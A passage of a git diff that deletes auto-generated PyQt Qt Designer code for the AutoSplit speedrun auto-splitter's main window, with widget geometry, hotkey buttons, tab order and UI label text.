self.undosplitLineEdit.setObjectName(_fromUtf8("undosplitLineEdit")) - self.skipsplitLineEdit = QtWidgets.QLineEdit(self.centralwidget) - self.skipsplitLineEdit.setGeometry(QtCore.QRect(316, 365, 81, 20)) - self.skipsplitLineEdit.setReadOnly(True) - self.skipsplitLineEdit.setObjectName(_fromUtf8("skipsplitLineEdit")) - self.resetLineEdit = QtWidgets.QLineEdit(self.centralwidget) - self.resetLineEdit.setGeometry(QtCore.QRect(316, 339, 81, 20)) - self.resetLineEdit.setReadOnly(True) - self.resetLineEdit.setObjectName(_fromUtf8("resetLineEdit")) - self.pausehotkeyLineEdit = QtWidgets.QLineEdit(self.centralwidget) - self.pausehotkeyLineEdit.setGeometry(QtCore.QRect(316, 416, 81, 20)) - self.pausehotkeyLineEdit.setReadOnly(True) - self.pausehotkeyLineEdit.setObjectName(_fromUtf8("pausehotkeyLineEdit")) - self.setsplithotkeyButton = QtWidgets.QPushButton(self.centralwidget) - self.setsplithotkeyButton.setGeometry(QtCore.QRect(409, 314, 71, 21)) - self.setsplithotkeyButton.setFocusPolicy(QtCore.Qt.NoFocus) - self.setsplithotkeyButton.setObjectName(_fromUtf8("setsplithotkeyButton")) - self.setresethotkeyButton = QtWidgets.QPushButton(self.centralwidget) - self.setresethotkeyButton.setGeometry(QtCore.QRect(410, 339, 71, 21)) - self.setresethotkeyButton.setFocusPolicy(QtCore.Qt.NoFocus) - self.setresethotkeyButton.setObjectName(_fromUtf8("setresethotkeyButton")) - self.setskipsplithotkeyButton = QtWidgets.QPushButton(self.centralwidget) - self.setskipsplithotkeyButton.setGeometry(QtCore.QRect(410, 365, 71, 21)) - self.setskipsplithotkeyButton.setFocusPolicy(QtCore.Qt.NoFocus) - self.setskipsplithotkeyButton.setObjectName(_fromUtf8("setskipsplithotkeyButton")) - self.setundosplithotkeyButton = QtWidgets.QPushButton(self.centralwidget) - self.setundosplithotkeyButton.setGeometry(QtCore.QRect(410, 391, 71, 21)) - self.setundosplithotkeyButton.setFocusPolicy(QtCore.Qt.NoFocus) - self.setundosplithotkeyButton.setObjectName(_fromUtf8("setundosplithotkeyButton")) - self.setpausehotkeyButton = QtWidgets.QPushButton(self.centralwidget) - self.setpausehotkeyButton.setGeometry(QtCore.QRect(410, 416, 71, 21)) - self.setpausehotkeyButton.setFocusPolicy(QtCore.Qt.NoFocus) - self.setpausehotkeyButton.setObjectName(_fromUtf8("setpausehotkeyButton")) - self.line_live_bottom = QtWidgets.QFrame(self.centralwidget) - self.line_live_bottom.setGeometry(QtCore.QRect(111, 247, 240, 2)) - self.line_live_bottom.setFrameShadow(QtWidgets.QFrame.Plain) - self.line_live_bottom.setLineWidth(1) - self.line_live_bottom.setFrameShape(QtWidgets.QFrame.HLine) - self.line_live_bottom.setObjectName(_fromUtf8("line_live_bottom")) - self.line_live_top = QtWidgets.QFrame(self.centralwidget) - self.line_live_top.setGeometry(QtCore.QRect(111, 68, 240, 2)) - self.line_live_top.setFrameShadow(QtWidgets.QFrame.Plain) - self.line_live_top.setLineWidth(1) - self.line_live_top.setFrameShape(QtWidgets.QFrame.HLine) - self.line_live_top.setObjectName(_fromUtf8("line_live_top")) - self.line_live_right = QtWidgets.QFrame(self.centralwidget) - self.line_live_right.setGeometry(QtCore.QRect(349, 69, 2, 180)) - self.line_live_right.setFrameShadow(QtWidgets.QFrame.Plain) - self.line_live_right.setLineWidth(1) - self.line_live_right.setFrameShape(QtWidgets.QFrame.VLine) - self.line_live_right.setObjectName(_fromUtf8("line_live_right")) - self.line_left = QtWidgets.QFrame(self.centralwidget) - self.line_left.setGeometry(QtCore.QRect(234, 296, 2, 163)) - self.line_left.setFrameShadow(QtWidgets.QFrame.Plain) - self.line_left.setLineWidth(1) - self.line_left.setFrameShape(QtWidgets.QFrame.VLine) - self.line_left.setObjectName(_fromUtf8("line_left")) - self.line_live_left = QtWidgets.QFrame(self.centralwidget) - self.line_live_left.setGeometry(QtCore.QRect(110, 69, 2, 180)) - self.line_live_left.setFrameShadow(QtWidgets.QFrame.Plain) - self.line_live_left.setLineWidth(1) - self.line_live_left.setFrameShape(QtWidgets.QFrame.VLine) - self.line_live_left.setObjectName(_fromUtf8("line_live_left")) - self.line_split_left = QtWidgets.QFrame(self.centralwidget) - self.line_split_left.setGeometry(QtCore.QRect(360, 69, 2, 180)) - self.line_split_left.setFrameShadow(QtWidgets.QFrame.Plain) - self.line_split_left.setLineWidth(1) - self.line_split_left.setFrameShape(QtWidgets.QFrame.VLine) - self.line_split_left.setObjectName(_fromUtf8("line_split_left")) - self.line_split_right = QtWidgets.QFrame(self.centralwidget) - self.line_split_right.setGeometry(QtCore.QRect(599, 69, 2, 180)) - self.line_split_right.setFrameShadow(QtWidgets.QFrame.Plain) - self.line_split_right.setLineWidth(1) - self.line_split_right.setFrameShape(QtWidgets.QFrame.VLine) - self.line_split_right.setObjectName(_fromUtf8("line_split_right")) - self.line_split_top = QtWidgets.QFrame(self.centralwidget) - self.line_split_top.setGeometry(QtCore.QRect(361, 68, 240, 2)) - self.line_split_top.setFrameShadow(QtWidgets.QFrame.Plain) - self.line_split_top.setLineWidth(1) - self.line_split_top.setFrameShape(QtWidgets.QFrame.HLine) - self.line_split_top.setObjectName(_fromUtf8("line_split_top")) - self.line_split_bottom = QtWidgets.QFrame(self.centralwidget) - self.line_split_bottom.setGeometry(QtCore.QRect(361, 247, 240, 2)) - self.line_split_bottom.setFrameShadow(QtWidgets.QFrame.Plain) - self.line_split_bottom.setLineWidth(1) - self.line_split_bottom.setFrameShape(QtWidgets.QFrame.HLine) - self.line_split_bottom.setObjectName(_fromUtf8("line_split_bottom")) - self.timerglobalhotkeysLabel = QtWidgets.QLabel(self.centralwidget) - self.timerglobalhotkeysLabel.setGeometry(QtCore.QRect(313, 293, 101, 20)) - self.timerglobalhotkeysLabel.setObjectName(_fromUtf8("timerglobalhotkeysLabel")) - self.line_right = QtWidgets.QFrame(self.centralwidget) - self.line_right.setGeometry(QtCore.QRect(489, 296, 2, 163)) - self.line_right.setFrameShadow(QtWidgets.QFrame.Plain) - self.line_right.setLineWidth(1) - self.line_right.setFrameShape(QtWidgets.QFrame.VLine) - self.line_right.setObjectName(_fromUtf8("line_right")) - self.liveImage = QtWidgets.QLabel(self.centralwidget) - self.liveImage.setGeometry(QtCore.QRect(111, 69, 240, 180)) - self.liveImage.setText(_fromUtf8("")) - self.liveImage.setObjectName(_fromUtf8("liveImage")) - self.currentSplitImage = QtWidgets.QLabel(self.centralwidget) - self.currentSplitImage.setGeometry(QtCore.QRect(361, 69, 240, 180)) - self.currentSplitImage.setText(_fromUtf8("")) - self.currentSplitImage.setObjectName(_fromUtf8("currentSplitImage")) - self.currentsplitimageLabel = QtWidgets.QLabel(self.centralwidget) - self.currentsplitimageLabel.setAlignment(QtCore.Qt.AlignCenter) - self.currentsplitimageLabel.setGeometry(QtCore.QRect(370, 50, 221, 20)) - self.currentsplitimageLabel.setObjectName(_fromUtf8("currentsplitimageLabel")) - self.imageloopLabel = QtWidgets.QLabel(self.centralwidget) - self.imageloopLabel.setGeometry(QtCore.QRect(362, 251, 108, 20)) - self.imageloopLabel.setObjectName(_fromUtf8("Image Loop #:")) - self.widthLabel = QtWidgets.QLabel(self.centralwidget) - self.widthLabel.setGeometry(QtCore.QRect(14, 177, 31, 16)) - self.widthLabel.setObjectName(_fromUtf8("widthLabel")) - self.heightLabel = QtWidgets.QLabel(self.centralwidget) - self.heightLabel.setGeometry(QtCore.QRect(68, 177, 31, 16)) - self.heightLabel.setObjectName(_fromUtf8("heightLabel")) - self.fpsvalueLabel = QtWidgets.QLabel(self.centralwidget) - self.fpsvalueLabel.setGeometry(QtCore.QRect(58, 225, 26, 20)) - self.fpsvalueLabel.setText(_fromUtf8("")) - self.fpsvalueLabel.setObjectName(_fromUtf8("fpsvalueLabel")) - self.widthSpinBox = QtWidgets.QSpinBox(self.centralwidget) - self.widthSpinBox.setGeometry(QtCore.QRect(6, 193, 44, 22)) - self.widthSpinBox.setMinimum(1) - self.widthSpinBox.setMaximum(10000) - self.widthSpinBox.setProperty("value", 640) - self.widthSpinBox.setObjectName(_fromUtf8("widthSpinBox")) - self.heightSpinBox = QtWidgets.QSpinBox(self.centralwidget) - self.heightSpinBox.setGeometry(QtCore.QRect(62, 193, 44, 22)) - self.heightSpinBox.setMinimum(1) - self.heightSpinBox.setMaximum(10000) - self.heightSpinBox.setProperty("value", 480) - self.heightSpinBox.setObjectName(_fromUtf8("heightSpinBox")) - self.captureregionLabel = QtWidgets.QLabel(self.centralwidget) - self.captureregionLabel.setGeometry(QtCore.QRect(192, 50, 81, 16)) - self.captureregionLabel.setObjectName(_fromUtf8("captureregionLabel")) - self.fpslimitLabel = QtWidgets.QLabel(self.centralwidget) - self.fpslimitLabel.setGeometry(QtCore.QRect(8, 251, 51, 16)) - self.fpslimitLabel.setObjectName(_fromUtf8("fpslimitLabel")) - self.fpslimitSpinBox = QtWidgets.QDoubleSpinBox(self.centralwidget) - self.fpslimitSpinBox.setGeometry(QtCore.QRect(62, 248, 44, 22)) - self.fpslimitSpinBox.setPrefix(_fromUtf8("")) - self.fpslimitSpinBox.setDecimals(0) - self.fpslimitSpinBox.setMinimum(30.0) - self.fpslimitSpinBox.setMaximum(5000.0) - self.fpslimitSpinBox.setSingleStep(1.0) - self.fpslimitSpinBox.setProperty("value", 60.0) - self.fpslimitSpinBox.setObjectName(_fromUtf8("fpslimitSpinBox")) - self.currentsplitimagefileLabel = QtWidgets.QLabel(self.centralwidget) - self.currentsplitimagefileLabel.setGeometry(QtCore.QRect(362, 271, 237, 20)) - self.currentsplitimagefileLabel.setText(_fromUtf8("")) - self.currentsplitimagefileLabel.setAlignment(QtCore.Qt.AlignCenter) - self.currentsplitimagefileLabel.setObjectName(_fromUtf8("currentsplitimagefileLabel")) - self.takescreenshotButton = QtWidgets.QPushButton(self.centralwidget) - self.takescreenshotButton.setGeometry(QtCore.QRect(250, 251, 91, 21)) - self.takescreenshotButton.setFocusPolicy(QtCore.Qt.NoFocus) - self.takescreenshotButton.setObjectName(_fromUtf8("takescreenshotButton")) - self.xSpinBox = QtWidgets.QSpinBox(self.centralwidget) - self.xSpinBox.setGeometry(QtCore.QRect(6, 154, 44, 22)) - self.xSpinBox.setReadOnly(False) - self.xSpinBox.setButtonSymbols(QtWidgets.QAbstractSpinBox.UpDownArrows) - self.xSpinBox.setMinimum(0) - self.xSpinBox.setMaximum(999999999) - self.xSpinBox.setSingleStep(1) - self.xSpinBox.setProperty("value", 0) - self.xSpinBox.setObjectName(_fromUtf8("xSpinBox")) - self.ySpinBox = QtWidgets.QSpinBox(self.centralwidget) - self.ySpinBox.setGeometry(QtCore.QRect(62, 154, 44, 22)) - self.ySpinBox.setReadOnly(False) - self.ySpinBox.setButtonSymbols(QtWidgets.QAbstractSpinBox.UpDownArrows) - self.ySpinBox.setMinimum(0) - self.ySpinBox.setMaximum(999999999) - self.ySpinBox.setProperty("value", 0) - self.ySpinBox.setObjectName(_fromUtf8("ySpinBox")) - self.yLabel = QtWidgets.QLabel(self.centralwidget) - self.yLabel.setGeometry(QtCore.QRect(81, 139, 7, 16)) - self.yLabel.setObjectName(_fromUtf8("yLabel")) - self.comparisonmethodComboBox = QtWidgets.QComboBox(self.centralwidget) - self.comparisonmethodComboBox.setGeometry(QtCore.QRect(143, 299, 81, 22)) - self.comparisonmethodComboBox.setObjectName(_fromUtf8("comparisonmethodComboBox")) - self.comparisonmethodComboBox.addItem(_fromUtf8("")) - self.comparisonmethodComboBox.addItem(_fromUtf8("")) - self.comparisonmethodComboBox.addItem(_fromUtf8("")) - self.pauseDoubleSpinBox = QtWidgets.QDoubleSpinBox(self.centralwidget) - self.pauseDoubleSpinBox.setGeometry(QtCore.QRect(160, 425, 64, 22)) - self.pauseDoubleSpinBox.setMaximum(999999999.0) - self.pauseDoubleSpinBox.setSingleStep(1.0) - self.pauseDoubleSpinBox.setProperty("value", 10.0) - self.pauseDoubleSpinBox.setObjectName(_fromUtf8("pauseDoubleSpinBox")) - self.custompausetimesCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.custompausetimesCheckBox.setEnabled(True) - self.custompausetimesCheckBox.setGeometry(QtCore.QRect(10, 435, 121, 17)) - self.custompausetimesCheckBox.setWhatsThis(_fromUtf8("")) - self.custompausetimesCheckBox.setChecked(False) - self.custompausetimesCheckBox.setTristate(False) - self.custompausetimesCheckBox.setObjectName(_fromUtf8("custompausetimesCheckBox")) - self.customthresholdsCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.customthresholdsCheckBox.setEnabled(True) - self.customthresholdsCheckBox.setGeometry(QtCore.QRect(10, 394, 111, 17)) - self.customthresholdsCheckBox.setWhatsThis(_fromUtf8("")) - self.customthresholdsCheckBox.setChecked(False) - self.customthresholdsCheckBox.setTristate(False) - self.customthresholdsCheckBox.setObjectName(_fromUtf8("customthresholdsCheckBox")) - self.comparisonmethodLabel = QtWidgets.QLabel(self.centralwidget) - self.comparisonmethodLabel.setGeometry(QtCore.QRect(10, 300, 101, 16)) - self.comparisonmethodLabel.setObjectName(_fromUtf8("comparisonmethodLabel")) - self.alignregionButton = QtWidgets.QPushButton(self.centralwidget) - self.alignregionButton.setGeometry(QtCore.QRect(5, 92, 101, 23)) - self.alignregionButton.setFocusPolicy(QtCore.Qt.NoFocus) - self.alignregionButton.setObjectName(_fromUtf8("alignregionButton")) - self.groupDummySplitsCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.groupDummySplitsCheckBox.setGeometry(QtCore.QRect(252, 440, 230, 17)) - self.groupDummySplitsCheckBox.setChecked(False) - self.groupDummySplitsCheckBox.setObjectName(_fromUtf8("groupDummySplitsCheckBox")) - self.selectwindowButton = QtWidgets.QPushButton(self.centralwidget) - self.selectwindowButton.setGeometry(QtCore.QRect(5, 117, 101, 23)) - self.selectwindowButton.setFocusPolicy(QtCore.Qt.NoFocus) - self.selectwindowButton.setObjectName(_fromUtf8("selectwindowButton")) - self.splitimagefolderLabel.raise_() - self.splitimagefolderLineEdit.raise_() - self.browseButton.raise_() - self.xLabel.raise_() - self.liveimageCheckBox.raise_() - self.loopCheckBox.raise_() - self.autostartonresetCheckBox.raise_() - self.selectregionButton.raise_() - self.similaritythresholdLabel.raise_() - self.similaritythresholdDoubleSpinBox.raise_() - self.startautosplitterButton.raise_() - self.resetButton.raise_() - self.undosplitButton.raise_() - self.skipsplitButton.raise_() - self.pauseLabel.raise_() - self.checkfpsButton.raise_() - self.fpsLabel.raise_() - self.showlivesimilarityCheckBox.raise_() - self.showhighestsimilarityCheckBox.raise_() - self.livesimilarityLabel.raise_() - self.highestsimilarityLabel.raise_() - self.splitLabel.raise_() - self.resetLabel.raise_() - self.skiptsplitLabel.raise_() - self.undosplitLabel.raise_() - self.pausehotkeyLabel.raise_() - self.splitLineEdit.raise_() - self.undosplitLineEdit.raise_() - self.skipsplitLineEdit.raise_() - self.resetLineEdit.raise_() - self.pausehotkeyLineEdit.raise_() - self.setsplithotkeyButton.raise_() - self.setresethotkeyButton.raise_() - self.setskipsplithotkeyButton.raise_() - self.setundosplithotkeyButton.raise_() - self.setpausehotkeyButton.raise_() - self.line_live_bottom.raise_() - self.line_live_top.raise_() - self.line_live_right.raise_() - self.line_left.raise_() - self.line_live_left.raise_() - self.line_split_left.raise_() - self.line_split_right.raise_() - self.line_split_top.raise_() - self.line_split_bottom.raise_() - self.timerglobalhotkeysLabel.raise_() - self.line_right.raise_() - self.currentsplitimageLabel.raise_() - self.imageloopLabel.raise_() - self.liveImage.raise_() - self.currentSplitImage.raise_() - self.widthLabel.raise_() - self.heightLabel.raise_() - self.fpsvalueLabel.raise_() - self.widthSpinBox.raise_() - self.heightSpinBox.raise_() - self.captureregionLabel.raise_() - self.fpslimitLabel.raise_() - self.fpslimitSpinBox.raise_() - self.currentsplitimagefileLabel.raise_() - self.takescreenshotButton.raise_() - self.xSpinBox.raise_() - self.ySpinBox.raise_() - self.yLabel.raise_() - self.comparisonmethodComboBox.raise_() - self.pauseDoubleSpinBox.raise_() - self.custompausetimesCheckBox.raise_() - self.customthresholdsCheckBox.raise_() - self.comparisonmethodLabel.raise_() - self.alignregionButton.raise_() - self.groupDummySplitsCheckBox.raise_() - self.selectwindowButton.raise_() - MainWindow.setCentralWidget(self.centralwidget) - self.menuBar = QtWidgets.QMenuBar(MainWindow) - self.menuBar.setGeometry(QtCore.QRect(0, 0, 612, 21)) - self.menuBar.setObjectName(_fromUtf8("menuBar")) - self.menuFile = QtWidgets.QMenu(self.menuBar) - self.menuFile.setObjectName(_fromUtf8("menuFile")) - self.menuHelp = QtWidgets.QMenu(self.menuBar) - self.menuHelp.setObjectName(_fromUtf8("menuHelp")) - MainWindow.setMenuBar(self.menuBar) - self.actionView_Help = QtWidgets.QAction(MainWindow) - self.actionView_Help.setObjectName(_fromUtf8("actionView_Help")) - self.actionAbout = QtWidgets.QAction(MainWindow) - self.actionAbout.setObjectName(_fromUtf8("actionAbout")) - self.actionSave_Settings = QtWidgets.QAction(MainWindow) - self.actionSave_Settings.setObjectName(_fromUtf8("actionSave_Settings")) - self.actionSave_Settings_As = QtWidgets.QAction(MainWindow) - self.actionSave_Settings_As.setObjectName(_fromUtf8("actionSave_Settings_As")) - self.actionLoad_Settings = QtWidgets.QAction(MainWindow) - self.actionLoad_Settings.setObjectName(_fromUtf8("actionLoad_Settings")) - self.menuHelp.addAction(self.actionView_Help) - self.menuHelp.addAction(self.actionAbout) - self.menuFile.addAction(self.actionSave_Settings) - self.menuFile.addAction(self.actionSave_Settings_As) - self.menuFile.addAction(self.actionLoad_Settings) - self.menuBar.addAction(self.menuFile.menuAction()) - self.menuBar.addAction(self.menuHelp.menuAction()) - - self.retranslateUi(MainWindow) - QtCore.QMetaObject.connectSlotsByName(MainWindow) - MainWindow.setTabOrder(self.splitimagefolderLineEdit, self.xSpinBox) - MainWindow.setTabOrder(self.xSpinBox, self.ySpinBox) - MainWindow.setTabOrder(self.ySpinBox, self.widthSpinBox) - MainWindow.setTabOrder(self.widthSpinBox, self.heightSpinBox) - MainWindow.setTabOrder(self.heightSpinBox, self.fpslimitSpinBox) - MainWindow.setTabOrder(self.fpslimitSpinBox, self.liveimageCheckBox) - MainWindow.setTabOrder(self.liveimageCheckBox, self.comparisonmethodComboBox) - MainWindow.setTabOrder(self.comparisonmethodComboBox, self.showlivesimilarityCheckBox) - MainWindow.setTabOrder(self.showlivesimilarityCheckBox, self.showhighestsimilarityCheckBox) - MainWindow.setTabOrder(self.showhighestsimilarityCheckBox, self.customthresholdsCheckBox) - MainWindow.setTabOrder(self.customthresholdsCheckBox, self.similaritythresholdDoubleSpinBox) - MainWindow.setTabOrder(self.similaritythresholdDoubleSpinBox, self.custompausetimesCheckBox) - MainWindow.setTabOrder(self.custompausetimesCheckBox, self.pauseDoubleSpinBox) - MainWindow.setTabOrder(self.pauseDoubleSpinBox, self.splitLineEdit) - MainWindow.setTabOrder(self.splitLineEdit, self.resetLineEdit) - MainWindow.setTabOrder(self.resetLineEdit, self.skipsplitLineEdit) - MainWindow.setTabOrder(self.skipsplitLineEdit, self.undosplitLineEdit) - MainWindow.setTabOrder(self.undosplitLineEdit, self.pausehotkeyLineEdit) - MainWindow.setTabOrder(self.pausehotkeyLineEdit, self.groupDummySplitsCheckBox) - MainWindow.setTabOrder(self.groupDummySplitsCheckBox, self.loopCheckBox) - MainWindow.setTabOrder(self.loopCheckBox, self.autostartonresetCheckBox) - - def retranslateUi(self, MainWindow): - MainWindow.setWindowTitle(_translate("MainWindow", "AutoSplit", None)) - self.splitimagefolderLabel.setText(_translate("MainWindow", "Split Image Folder:", None)) - self.browseButton.setText(_translate("MainWindow", "Browse..", None)) - self.xLabel.setText(_translate("MainWindow", "X", None)) - self.liveimageCheckBox.setText(_translate("MainWindow", "Live Capture Region", None)) - self.loopCheckBox.setText(_translate("MainWindow", "Loop Split Images", None)) - self.autostartonresetCheckBox.setText(_translate("MainWindow", "Auto Start On Reset", None)) - self.selectregionButton.setText(_translate("MainWindow", "Select Region", None)) - self.similaritythresholdLabel.setText(_translate("MainWindow", "Similarity threshold", None)) - self.startautosplitterButton.setText(_translate("MainWindow", "Start Auto Splitter", None)) - self.resetButton.setText(_translate("MainWindow", "Reset", None)) - self.undosplitButton.setText(_translate("MainWindow", "Undo Split", None)) - self.skipsplitButton.setText(_translate("MainWindow", "Skip Split", None)) - self.pauseLabel.setText(_translate("MainWindow", "Pause time after split (sec)", None)) - self.checkfpsButton.setText(_translate("MainWindow", "Max FPS", None)) - self.fpsLabel.setText(_translate("MainWindow", "FPS", None)) - self.showlivesimilarityCheckBox.setText(_translate("MainWindow", "Show live similarity", None)) - self.showhighestsimilarityCheckBox.setText(_translate("MainWindow", "Show highest similarity", None)) - self.splitLabel.setText(_translate("MainWindow", "Start / Split", None)) - self.resetLabel.setText(_translate("MainWindow", "Reset", None)) - self.skiptsplitLabel.setText(_translate("MainWindow", "Skip Split", None)) - self.undosplitLabel.setText(_translate("MainWindow", "Undo Split", None)) - self.pausehotkeyLabel.setText(_translate("MainWindow", "Pause", None)) - self.setsplithotkeyButton.setText(_translate("MainWindow", "Set Hotkey", None)) - self.setresethotkeyButton.setText(_translate("MainWindow", "Set Hotkey", None)) - self.setskipsplithotkeyButton.setText(_translate("MainWindow", "Set Hotkey", None)) - self.setundosplithotkeyButton.setText(_translate("MainWindow", "Set Hotkey", None)) - self.setpausehotkeyButton.setText(_translate("MainWindow", "Set Hotkey", None)) - self.timerglobalhotkeysLabel.setText(_translate("MainWindow", "Timer Global Hotkeys", None)) - self.currentsplitimageLabel.setText(_translate("MainWindow", "Current Split Image", None)) - self.imageloopLabel.setText(_translate("MainWindow", "Image Loop #:", None)) - self.widthLabel.setText(_translate("MainWindow", "Width", None)) - self.heightLabel.setText(_translate("MainWindow", "Height", None)) - self.captureregionLabel.setText(_translate("MainWindow", "Capture Region", None)) - self.fpslimitLabel.setText(_translate("MainWindow", "FPS Limit:", None)) - self.takescreenshotButton.setText(_translate("MainWindow", "Take Screenshot", None)) - self.yLabel.setText(_translate("MainWindow", "Y", None)) - self.comparisonmethodComboBox.setItemText(0, _translate("MainWindow", "L2 Norm", None)) - self.comparisonmethodComboBox.setItemText(1, _translate("MainWindow", "Histograms", None)) - self.comparisonmethodComboBox.setItemText(2, _translate("MainWindow", "pHash", None)) - self.custompausetimesCheckBox.setText(_translate("MainWindow", "Custom pause times", None)) - self.customthresholdsCheckBox.setText(_translate("MainWindow", "Custom thresholds", None)) - self.comparisonmethodLabel.setText(_translate("MainWindow", "Comparison Method", None)) - self.alignregionButton.setText(_translate("MainWindow", "Align Region", None)) - self.groupDummySplitsCheckBox.setText(_translate("MainWindow", "Group dummy splits when undoing/skipping", None)) - self.selectwindowButton.setText(_translate("MainWindow", "Select Window", None)) - self.menuHelp.setTitle(_translate("MainWindow", "Help", None)) - self.menuFile.setTitle(_translate("MainWindow", "File", None)) - self.actionView_Help.setText(_translate("MainWindow", "View Help", None)) - self.actionAbout.setText(_translate("MainWindow", "About", None)) - self.actionSave_Settings.setText(_translate("MainWindow", "Save Settings", None)) - self.actionSave_Settings_As.setText(_translate("MainWindow", "Save Settings As...", None)) - self.actionLoad_Settings.setText(_translate("MainWindow", "Load Settings", None)) - - -if __name__ == "__main__": - import sys - app = QtWidgets.QApplication(sys.argv) - MainWindow = QtWidgets.QMainWindow() - ui = Ui_MainWindow() - ui.setupUi(MainWindow) - MainWindow.show() - sys.exit(app.exec_()) diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$design.py.target.py b/v1/data/codefile/toufool@auto-split__86244b6__src$design.py.target.py deleted file mode 100644 index 992438a..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$design.py.target.py +++ /dev/null @@ -1,563 +0,0 @@ -# -*- coding: utf-8 -*- - -# Form implementation generated from reading ui file 'design.ui' -# -# Created by: PyQt6 UI code generator 4.11.4 -# -# WARNING! All changes made in this file will be lost! - -from PyQt6 import QtCore, QtGui, QtWidgets - -try: - _fromUtf8 = QtCore.QString.fromUtf8 -except AttributeError: - def _fromUtf8(s): - return s - -try: - _encoding = QtWidgets.QApplication.UnicodeUTF8 - - def _translate(context, text, disambig): - return QtWidgets.QApplication.translate(context, text, disambig, _encoding) -except AttributeError: - def _translate(context, text, disambig): - return QtWidgets.QApplication.translate(context, text, disambig) - - -class Ui_MainWindow(object): - def setupUi(self, MainWindow): - MainWindow.setObjectName(_fromUtf8("MainWindow")) - MainWindow.resize(612, 490) - sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Policy.Fixed, QtWidgets.QSizePolicy.Policy.Fixed) - sizePolicy.setHorizontalStretch(0) - sizePolicy.setVerticalStretch(0) - sizePolicy.setHeightForWidth(MainWindow.sizePolicy().hasHeightForWidth()) - MainWindow.setSizePolicy(sizePolicy) - MainWindow.setMinimumSize(QtCore.QSize(622, 490)) - MainWindow.setMaximumSize(QtCore.QSize(622, 490)) - icon = QtGui.QIcon() - icon.addPixmap(QtGui.QPixmap(_fromUtf8("../../VideoAutoSplitter/icon.ico")), QtGui.QIcon.Mode.Normal, QtGui.QIcon.State.Off) - MainWindow.setWindowIcon(icon) - MainWindow.setWhatsThis(_fromUtf8("")) - MainWindow.setLayoutDirection(QtCore.Qt.LayoutDirection.LeftToRight) - self.centralwidget = QtWidgets.QWidget(MainWindow) - self.centralwidget.setObjectName(_fromUtf8("centralwidget")) - self.splitimagefolderLabel = QtWidgets.QLabel(self.centralwidget) - self.splitimagefolderLabel.setGeometry(QtCore.QRect(90, 13, 91, 16)) - self.splitimagefolderLabel.setObjectName(_fromUtf8("splitimagefolderLabel")) - self.splitimagefolderLineEdit = QtWidgets.QLineEdit(self.centralwidget) - self.splitimagefolderLineEdit.setGeometry(QtCore.QRect(187, 11, 247, 20)) - self.splitimagefolderLineEdit.setReadOnly(True) - self.splitimagefolderLineEdit.setObjectName(_fromUtf8("splitimagefolderLineEdit")) - self.browseButton = QtWidgets.QPushButton(self.centralwidget) - self.browseButton.setGeometry(QtCore.QRect(443, 9, 75, 24)) - self.browseButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.browseButton.setObjectName(_fromUtf8("browseButton")) - self.xLabel = QtWidgets.QLabel(self.centralwidget) - self.xLabel.setGeometry(QtCore.QRect(25, 139, 7, 16)) - self.xLabel.setObjectName(_fromUtf8("xLabel")) - self.liveimageCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.liveimageCheckBox.setEnabled(True) - self.liveimageCheckBox.setGeometry(QtCore.QRect(125, 253, 121, 17)) - self.liveimageCheckBox.setChecked(True) - self.liveimageCheckBox.setTristate(False) - self.liveimageCheckBox.setObjectName(_fromUtf8("liveimageCheckBox")) - self.loopCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.loopCheckBox.setEnabled(True) - self.loopCheckBox.setGeometry(QtCore.QRect(500, 314, 121, 17)) - self.loopCheckBox.setChecked(False) - self.loopCheckBox.setTristate(False) - self.loopCheckBox.setObjectName(_fromUtf8("loopCheckBox")) - self.autostartonresetCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.autostartonresetCheckBox.setEnabled(True) - self.autostartonresetCheckBox.setGeometry(QtCore.QRect(500, 344, 121, 17)) - self.autostartonresetCheckBox.setChecked(False) - self.autostartonresetCheckBox.setTristate(False) - self.autostartonresetCheckBox.setObjectName(_fromUtf8("autostartonresetCheckBox")) - self.selectregionButton = QtWidgets.QPushButton(self.centralwidget) - self.selectregionButton.setGeometry(QtCore.QRect(5, 67, 101, 23)) - self.selectregionButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.selectregionButton.setObjectName(_fromUtf8("selectregionButton")) - self.similaritythresholdLabel = QtWidgets.QLabel(self.centralwidget) - self.similaritythresholdLabel.setGeometry(QtCore.QRect(10, 378, 91, 16)) - self.similaritythresholdLabel.setObjectName(_fromUtf8("similaritythresholdLabel")) - self.similaritythresholdDoubleSpinBox = QtWidgets.QDoubleSpinBox(self.centralwidget) - self.similaritythresholdDoubleSpinBox.setGeometry(QtCore.QRect(160, 383, 64, 22)) - self.similaritythresholdDoubleSpinBox.setMaximum(1.0) - self.similaritythresholdDoubleSpinBox.setSingleStep(0.01) - self.similaritythresholdDoubleSpinBox.setProperty("value", 0.9) - self.similaritythresholdDoubleSpinBox.setObjectName(_fromUtf8("similaritythresholdDoubleSpinBox")) - self.startautosplitterButton = QtWidgets.QPushButton(self.centralwidget) - self.startautosplitterButton.setGeometry(QtCore.QRect(506, 425, 101, 31)) - self.startautosplitterButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.startautosplitterButton.setObjectName(_fromUtf8("startautosplitterButton")) - self.resetButton = QtWidgets.QPushButton(self.centralwidget) - self.resetButton.setGeometry(QtCore.QRect(506, 385, 101, 31)) - self.resetButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.resetButton.setObjectName(_fromUtf8("resetButton")) - self.undosplitButton = QtWidgets.QPushButton(self.centralwidget) - self.undosplitButton.setGeometry(QtCore.QRect(477, 251, 61, 21)) - self.undosplitButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.undosplitButton.setObjectName(_fromUtf8("undosplitButton")) - self.skipsplitButton = QtWidgets.QPushButton(self.centralwidget) - self.skipsplitButton.setGeometry(QtCore.QRect(541, 251, 61, 21)) - self.skipsplitButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.skipsplitButton.setObjectName(_fromUtf8("skipsplitButton")) - self.pauseLabel = QtWidgets.QLabel(self.centralwidget) - self.pauseLabel.setGeometry(QtCore.QRect(10, 420, 140, 16)) - 